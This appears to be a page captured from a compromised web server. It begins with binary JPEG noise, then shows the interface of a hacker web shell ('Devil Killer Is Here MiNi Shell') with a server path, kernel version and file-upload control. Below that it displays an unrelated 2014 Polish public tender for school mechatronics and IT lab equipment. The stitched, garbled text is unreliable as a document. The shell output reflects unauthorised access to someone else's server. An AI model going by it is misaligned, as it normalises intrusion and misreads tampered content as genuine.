JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140325/63435-N-2014.html

<p class="kh_header"><b>Tarnowskie Góry: Doposażenie dwóch pracowni praktycznej nauki zawodu oraz zakup materiałów dydaktycznych w Zespole Szkół Techniczno - Humanistycznych w Radzionkowie w ramach projektu Mam zawód-mam pracę w regionie</b><br>
<b>Numer ogłoszenia: 63435 - 2014; data zamieszczenia: 25.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tarnogórski , ul. Karłuszowiec 5, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 3813786, faks 032 3813727.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.tarnogorski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie dwóch pracowni praktycznej nauki zawodu oraz zakup materiałów dydaktycznych w Zespole Szkół Techniczno - Humanistycznych w Radzionkowie w ramach projektu Mam zawód-mam pracę w regionie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest doposażenie dwóch pracowni praktycznej nauki zawodu oraz zakup materiałów dydaktycznych w Zespole Szkół Techniczno - Humanistycznych w Radzionkowie. Przedmiot zamówienia realizowany jest w ramach projektu systemowego pn. Mam zawód - mam pracę w regionie, który jest współfinansowany przez Powiat Tarnogórski, Budżet Państwa oraz Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013. 
2. Opis przedmiotu zamówienia: (przedmiot zamówienia został podzielony na 3 części)
Część A - Doposażenie pracowni mechatroniki w Zespole Szkół Techniczno - Humanistycznych w Radzionkowie, w ramach projektu pn. Mam zawód  - mam pracę w regionie.
1. Przedmiotem zamówienia jest zakup wraz z dostawą fabrycznie nowego, pochodzącego z legalnego źródła, zmontowanego oraz sprawnego sprzętu dla Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie.
2. Wykonawca zobowiązany jest do dostarczenia dwóch stanowisk egzaminacyjnych umożliwiających przeprowadzenie egzaminu zawodowego dla zawodu technik mechatronik kwalifikacja E.3 Montaż urządzeń i systemów mechatronicznych oraz kwalifikacja E.18 Eksploatacja urządzeń i systemów mechatronicznych zgodnych z Informatorem CKE. Stanowiska egzaminacyjne powinny się składać z następujących elementów:
1) Płyta montażowa egzaminacyjna z profili aluminiowych o wymiarach między 700-800 mm x500-600 mm x 35 mm, z rowkami montażowymi typu T - 2 sztuki;
2) Płyta montażowa egzaminacyjna pionowa o wymiarach płyty od 500 do 600 mm x od 300 do 400 mm. Wyposażona w uchwyt, szyny DIN (2 szt.) oraz koryto grzebieniowe do montażu elementów sterowania i sygnalizacji - 2 sztuki;
3) Siłownik jednostronnego działania o skoku w granicach 15 - 20 cm, przystosowany do podłączenia szybkozłącza oraz czujników położenia wraz z uchwytem umożliwiającym montaż na płycie montażowej - 4 sztuki;
4) Siłownik dwustronnego działania o skoku w granicach 15 - 20 cm, przystosowany do podłączenia szybkozłącza oraz czujników położenia. wraz z uchwytem umożliwiającym montaż na płycie montażowej - 4 sztuki;
5) Zespół przygotowania powierza wyposażony w reduktor, manometr, filtr raz smarownicę, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 2 sztuki;
6) Kompresor - ciśnienie 6-8 barów zbiornik w granicach 40-50 litrów - 1 sztuka;
7) Elektrozawór 5/2 z samoczynnym powrotem - jednocewkowy, napięcie zasilania cewki w granicach 12- 24 V DC, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 2 sztuki;
8) Elektrozawór 5/2 bez samoczynnego  powrotu - dwucewkowy, napięcie zasilania cewki w granicach 12- 24 V DC - 4 sztuki;
9) Elektrozawór 3/2 z samoczynnym powrotem - jednocewkowy NC, napięcie zasilania cewki w granicach 12- 24 V DC, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 2 sztuki;
10) Zawór pneumatyczny 5/2 - monostabilny, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 2 sztuki;
11) Zawór pneumatyczny 5/2 - bistabilny, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 2 sztuki;
12) Zawór 3/2 - zawór sterowany ręcznie 3/2 ze sprężyną zwrotną, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 2 sztuki;
13) Zawór podwójnego sygnału AND, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 2 sztuki;
14) Zawór dwudrogowy OR, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 2 sztuki;
15) Wyłącznik krańcowy z rolką, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 4 sztuki;
16) Sterownik programowalny PLC o co najmniej 8 wejściach cyfrowych, 6 wyjściach cyfrowych przekaźnikowych z wyjściem Ethernetowym, zasilany napięciem DC 12 do 24 V, wraz z oprogramowaniem oraz z możliwością montażu na szynie DIN - 2 sztuki;
17) Zasilacz z zakresem napięciowym umożliwiającym zasilenie sterownika PLC, elektrozaworów oraz czujników wchodzących w skład stanowiska (zasilacz 24V/2A) - 2 sztuki;
18) Czujnik położenia tłoka o zasilaniu w granicach 12- 24 V DC, wraz z uchwytem czujnika - 6 sztuk;
19) Czujnik indukcyjny cyfrowy, zasilanie w granicach 12- 24 V DC, NO, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 4 sztuki;
20) Czujnik optyczny cyfrowy odbiciowy PNP, zasilanie w granicach 12- 24 V DC, NO, wraz z uchwytem umożliwiającym montaż na płycie montażowej - 4 sztuki;
21) Kontrolki umożliwiające sygnalizację stanów o kolorach zielony, czerwony, żółty - zasilane napięciem w granicach 12- 24 V DC wraz z uchwytem umożliwiającym montaż na płycie montażowej - 4 komplety;
22) Przyciski NO bez samoczynnego powrotu z możliwością montażu na szynie DIN - 2 sztuki;
23) Przyciski NC z samoczynnym powrotem z możliwością montażu na szynie DIN - 2 sztuki;
24) Przyciski NO z samoczynnym  powrotem z możliwością montażu na szynie DIN - 2 sztuki;
25) Dławik przepływu (dławiąco zwrotny) sterowany ręcznie - 2 sztuki;
26) Złączka rozdzielająca do szybkozłączy pneumatycznych - 8 sztuk;
27) Przewody elektryczne - komplet do zestawu egzaminacyjnego - przewody mają umożliwić podłączenie wszystkich elementów tworzących stanowisko tj. elektrozaworów, czujników, łączników, sterownika PLC itd. - 1 komplet;
28) Armatura pneumatyczna - przewody pneumatyczne, tłumiki i złączki pneumatyczne - elementy mają umożliwić kompatybilne połączenie elementów pneumatyki i elektropneumatyki za pomocą tzw. szybkozłączek. Przewody o długości pozwalającej na swobodne rozmieszczenie elementów na tablicach (płytach) montażowych - 1 komplet;
29) Dedykowane mocowania elementów pneumatyki, elektropneumatyki, sensoryki do płyty montażowej - 1 komplet;
30) Sygnalizatory - zabezpieczenie stanowiska - bezpiecznik oraz sygnalizator zasilania wraz z listwą przyłączeniową i wyłącznikiem bezpieczeństwa - 1 sztuka;
31) Rzutnik multimedialny - projektor dla celów prezentacji efektów pracy z komputera PC będącego częścią stanowiska. Projektor powinien mieć minimalną rozdzielczość 1024 x 768, kontrast 13000:1 oraz jasność min. 2700 ANSIlm - 1 sztuka;
32) Multimetr - miernik uniwersalny multimetr z możliwością pomiarów AC/DC , z testem ciągłości wraz z bateriami - 5 sztuk;
33) Stolik laboratoryjny - osobowy: rozmiar blatu minimum 2500 x 700 mm, blat o grubości min 30 mm wykończony PCV o grubości minimum 2 mm, stelaż o profilu minimum 40 x 40 mm, wzrost osoby siedzącej przy stoliku w zakresie 170 cm - 200cm. Stolik wyposażony w gniazdka sieciowe jednofazowe 4 oraz wyłącznik awaryjny - 2 sztuki;
34) Krzesło - stabilne, wytrzymałe, metalowy stelaż, stopki chroniące podłogi przed zarysowaniem, dostosowane do osób o wzroście od 170 cm do 200 cm - 10 sztuk;
35) Biurko komputerowe o wymiarach min. 850 mm X 600 mm z wysuwaną półką na klawiaturę - 2 sztuki;
36) Szafka o wymiarach min 76 x 40 x 80 cm z płyty laminowanej, z obrzeżem 0,5 mm kolor płyty meblowej buk lub klon, zamykana na klucz. - 2 sztuki;
37) Rozdzielnica, rozdzielnia elektryczna z minimalną ilością 16 modułów natynkowa z tworzywa sztucznego - 1 sztuka;
38) Wyłącznik różnicowoprądowy trójfazowy 25 A, prąd różnicowy	30mA. 1sztuka;
39) Rozłącznik izolacyjny 16A 1 fazowy - 9 sztuk;
40) Gniazda wtyczkowe stałe, naścienne, rozbieralne, ze stykiem ochronnym, z zaciskami gwintowymi, pojedyncze - 6 szt.;
41) Korytko kablowe min. 40x40 białe 20 mb;
42) Przewód YDYp 3x1,5mm2 - 450/750V 50 mb;
43) Kołek rozporowy z łbem sześciokątnym KKX 10/6x60 - paczka 100szt.
44) Komputer stacjonarny wraz z monitorem LCD - 2 zestawy (szczegółowy opis zestawów komputerowych stanowi załącznik nr 5 do SIWZ).
3. Wszystkie elementy stanowiska powinny być ze sobą kompatybilne jeśli chodzi o rodzaj zasilania oraz sposób podłączenia elementów pneumatycznych i elektropneumatycznych (szybkozłącza) - stanowią jedno stanowisko laboratoryjne.
4. Wskazane parametry należy traktować jako minimalne. Wykonawca może zaoferować urządzenia o parametrach lepszych, większych, bardziej funkcjonalnych, jednakże musi mieć na względzie miejsce przeznaczenia oraz potencjalnych użytkowników dostarczonego sprzętu. 
5. Sprzęt powinien być tak skonfigurowany, aby zapewniał współdziałanie z innymi zamawianymi jednostkami. W/w sprzęt winien posiadać niezbędne dokumenty dopuszczające do użytku w szkole. Dostarczony sprzęt winien być sprawny oraz I jakości. 
6. Wykonawca zobowiązuje się do wykonania, montażu i rozruchu dostarczonego sprzętu oraz udzielenia instruktażu dotyczącego stosowania zakupionego i dostarczonego sprzętu.
7. Zaoferowana cena powinna obejmować koszty zakupu wyposażenia pracowni, jego transport wraz z wniesieniem do miejsca wskazanego przez Zamawiającego oraz montaż wraz z rozruchem i instruktażem.
8. Wykonawca dostarczy przedmiot zamówienia w terminie do 14 dni kalendarzowych od daty podpisania umowy przez Zamawiającego i Wykonawcę do Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie, ul. Knosały 113.
9. Z czynności odbioru zostanie sporządzony protokół. Odbiór nastąpi w miejscu dostarczenia sprzętu, w obecności przedstawiciela Zamawiającego oraz Wykonawcy i będzie polegał na analizie technicznej i wizualnej (optycznej) przedmiotu zamówienia.
10. W przypadku stwierdzenia wad lub usterek przedmiotu zamówienia podczas odbioru przez Zamawiającego, Wykonawca zobowiązuje się wymienić uszkodzony towar na nowy w terminie do 3 dni od daty sporządzenia protokołu stwierdzającego daną usterkę lub wadę.
11. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
12. Okres gwarancji na przedmiot zamówienia wynosi 24 miesiące od dnia podpisania przez obie strony bezusterkowego protokołu odbioru przedmiotu umowy.
13. Po podpisaniu bezusterkowego protokołu odbioru przedmiotu zamówienia przez Zamawiającego i Wykonawcę, Wykonawca wystawi Zamawiającemu za przedmiot umowy fakturę, po wcześniejszym jej uzgodnieniu z Zamawiającym.
14. Płatność nastąpi przelewem na rachunek bankowy wskazany w fakturze/rachunku w terminie do 14 dni kalendarzowych od daty wpływu do kancelarii ogólnej Zamawiającego prawidłowo wystawionej faktury/rachunku.
15. Wynagrodzenie nie podlega waloryzacji do końca realizacji umowy, także w razie zmiany stawki podatku VAT.
16. Niedoszacowanie, pominięcie, lub nienależyte rozpoznanie zakresu przedmiotu zamówienia nie może być podstawą do żądania zmiany wynagrodzenia.
17. Wykonawca będzie zobowiązany do przygotowania nalepek samoprzylepnych w ilości pozwalającej okleić każdy element realizowanego zamówienia z następującymi informacjami:
1) nazwa wykonawcy,
2) numer umowy.
18. Wykonawca oświadcza, że przedmiot zamówienia będzie posiadał instrukcję w języku polskim (dotyczy tych elementów przedmiotu zamówienia, dla których istnieje instrukcja).
19. Z wybranym w drodze postępowania Wykonawcą Zamawiający zawrze umowę zgodnie z załącznikiem nr 7a do SIWZ z uwzględnieniem jego formy organizacyjno - prawnej.
CZĘŚĆ B - Doposażenie pracowni informatyki w Zespole Szkół Techniczno - Humanistycznych w Radzionkowie, w ramach projektu pn. Mam zawód  - mam pracę w regionie.
1. Przedmiotem zamówienia jest zakup wraz z dostawą fabrycznie nowego, pochodzącego z legalnego źródła, sprawnego monitora - TV do Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie.
2. Szczegółowa specyfikacja techniczna sprzętu - monitora TV, stanowiącego przedmiot zamówienia:
1) Ekran min. 60 cali / 152 cm, 16:9;
2) Rozdzielczość Full HD, min. 1920 x 1080;
3) Tuner  DVB-T (MPEG-4) - cyfrowy naziemny, DVB-C - cyfrowy kablowy, DVB-S -cyfrowy satelitarny, analogowy;
4) Wi-Fi, DLNA, HbbTV, Przeglądarka internetowa, Menu w języku polskim, USB - zdjęcia, muzyka, film;
5) Wejścia / wyjścia: HDMI, USB, EURO, Złącze Ethernet (LAN), Wejście komponentowe, Wejście PC VGA, Wyjście słuchawkowe;
6) Zestaw montażowy naścienny;
7) Kabel VGA SVGA XVGA do telewizora, monitora, PC, laptopa 5 metrów;
8) Gwarancja min. 24 miesiące.
3. Wskazane parametry należy traktować jako minimalne. Wykonawca może zaoferować urządzenie o parametrach lepszych, większych, bardziej funkcjonalnych, jednakże musi mieć na względzie miejsce przeznaczenia oraz potencjalnych użytkowników dostarczonego sprzętu. 
4. Sprzęt winien posiadać niezbędne dokumenty dopuszczające do użytku w szkole. Dostarczony sprzęt winien być sprawny oraz I jakości. 
5. Wykonawca zobowiązuje się do rozruchu dostarczonego sprzętu oraz udzielenia instruktażu dotyczącego zakupionego i dostarczonego sprzętu.
6. Zaoferowana cena powinna obejmować koszty zakupu wyposażenia pracowni, jego transport wraz z wniesieniem do miejsca wskazanego przez Zamawiającego oraz montaż wraz z instruktażem.
7. Wykonawca dostarczy przedmiot zamówienia w terminie do 14 dni kalendarzowych od daty podpisania umowy przez Zamawiającego i Wykonawcę do Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie, ul. Knosały 113.
8. Z czynności odbioru zostanie sporządzony protokół. Odbiór nastąpi w miejscu dostarczenia sprzętu, w obecności przedstawiciela Zamawiającego oraz Wykonawcy i będzie polegał na analizie technicznej i wizualnej (optycznej) przedmiotu zamówienia.
9. W przypadku stwierdzenia wad lub usterek przedmiotu zamówienia podczas odbioru przez Zamawiającego, Wykonawca zobowiązuje się wymienić uszkodzony towar na nowy w terminie do 3 dni od daty sporządzenia protokołu stwierdzającego daną usterkę lub wadę.
10. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
11. Okres gwarancji na przedmiot zamówienia wynosi 24 miesiące od dnia podpisania przez obie strony bezusterkowego protokołu odbioru przedmiotu umowy.
12. Po podpisaniu bezusterkowego protokołu odbioru przedmiotu zamówienia przez Zamawiającego i Wykonawcę, Wykonawca wystawi Zamawiającemu za przedmiot umowy fakturę, po wcześniejszym jej uzgodnieniu z Zamawiającym.
13. Płatność nastąpi przelewem na rachunek bankowy wskazany w fakturze/rachunku w terminie do 14 dni kalendarzowych od daty wpływu do kancelarii ogólnej Zamawiającego prawidłowo wystawionej faktury/rachunku.
14. Wynagrodzenie nie podlega waloryzacji do końca realizacji umowy, także w razie zmiany stawki podatku VAT.
15. Niedoszacowanie, pominięcie, lub nienależyte rozpoznanie zakresu przedmiotu zamówienia nie może być podstawą do żądania zmiany wynagrodzenia.
16. Wykonawca będzie zobowiązany do przygotowania nalepek samoprzylepnych w ilości pozwalającej okleić każdy element realizowanego zamówienia z następującymi informacjami:
- nazwa wykonawcy,
- numer umowy.
17. Wykonawca oświadcza, że przedmiot zamówienia będzie posiadał instrukcję w języku polskim.
18. Z wybranym w drodze postępowania Wykonawcą Zamawiający zawrze umowę zgodnie z załącznikiem nr 7b do SIWZ z uwzględnieniem jego formy organizacyjno - prawnej.
CZĘŚĆ C Zakup materiałów dydaktycznych dla Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie w ramach projektu pn. Mam zawód  - mam pracę w regionie.
1. Przedmiotem zamówienia jest zakup materiałów i pomocy dydaktycznych dla Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie w ramach projektu Mam zawód - mam pracę w regionie. Przedmiot zamówienia realizowany jest w ramach projektu systemowego pn. Mam zawód - mam pracę w regionie, który jest współfinansowany przez Powiat Tarnogórski, Budżet Państwa oraz Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013.
2. Wykonawca zobowiązany jest do dostarczenia programu edukacyjnego do symulacji układów pneumatyki i elektropneumatyki dla uczniów kształcących się na kierunku technik mechatronik. Program musi pracować pod systemem operacyjnym Windows, licencja stanowiskowa z możliwością instalacji na 4 komputerach.
3. Zaoferowana cena powinna obejmować koszty materiałów dydaktycznych oraz ich transport wraz z wniesieniem do Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie, ul. Knosały 113.
4. Wyżej wymienione materiały i pomoce dydaktyczne winny posiadać niezbędne dokumenty dopuszczające do użytku w szkole. Dostarczony przedmiot zamówienia winien być sprawny oraz pierwszej jakości.
5. Wykonawca oświadcza iż przedmiot zamówienia będzie posiadał instrukcję w języku polskim.
6. Wykonawca dostarczy przedmiot zamówienia w terminie do 14 dni kalendarzowych od daty podpisania umowy przez Zamawiającego i Wykonawcę, do Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie, ul. Knosały 113.
7. Z czynności odbioru zostanie sporządzony protokół odbioru. Odbiór nastąpi w miejscu dostarczenia materiałów dydaktycznych, w obecności przedstawiciela Zamawiającego oraz Wykonawcy i będzie polegał na analizie technicznej i wizualnej (optycznej) przedmiotu zamówienia.
8. W przypadku stwierdzenia wad lub usterek przedmiotu zamówienia podczas odbioru przez Zamawiającego, Wykonawca zobowiązuje się wymienić uszkodzony towar na nowy w terminie do 3 dni roboczych od daty sporządzenia protokołu stwierdzającego daną usterkę lub wadę.
9. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
10. Okres gwarancji na przedmiot zamówienia wynosi 24 miesiące od dnia podpisania przez obie strony bezusterkowego protokołu odbioru przedmiotu umowy.
11. Po podpisaniu bezusterkowego protokołu odbioru przedmiotu zamówienia przez Zamawiającego i Wykonawcę, Wykonawca wystawi Zamawiającemu za przedmiot umowy fakturę, po wcześniejszym jej uzgodnieniu z Zamawiającym.
12. Płatność nastąpi przelewem na rachunek bankowy wskazany w fakturze/rachunku w terminie do 14 dni kalendarzowych od daty wpływu do kancelarii ogólnej Zamawiającego, prawidłowo wystawionej faktury/rachunku.
13. Wynagrodzenie VAT nie podlega waloryzacji do końca realizacji umowy, także w razie zmiany stawki podatku.
14. Niedoszacowanie, pominięcie, lub nienależyte rozpoznanie zakresu przedmiotu zamówienia nie może być podstawą do żądania zmiany wynagrodzenia.
15. Zaoferowana cena ma obejmować koszt zakupu materiałów i pomocy dydaktycznych oraz ich transport wraz z wniesieniem do Zespołu Szkół Techniczno - Humanistycznych w Radzionkowie, ul. Knosały 113.
16. Z wybranym w drodze postępowania Wykonawcą Zamawiający zawrze umowę zgodnie z załącznikiem nr 7c do SIWZ z uwzględnieniem jego formy organizacyjno - prawnej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.13.21.30-3, 42.13.21.00-4, 42.13.20.00-3, 42.13.00.00-9, 42.10.00.00-0, 42.00.00.00-6, 42.12.30.00-7, 42.12.00.00-6, 31.21.13.10-4, 31.17.00.00-8, 31.71.00.00-6, 31.70.00.00-3, 31.00.00.00-6, 31.68.00.00-6, 39.18.00.00-7, 39.10.00.00-3, 39.13.00.00-2, 39.13.40.00-0, 31.22.41.00-3, 31.22.40.00-2, 31.22.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

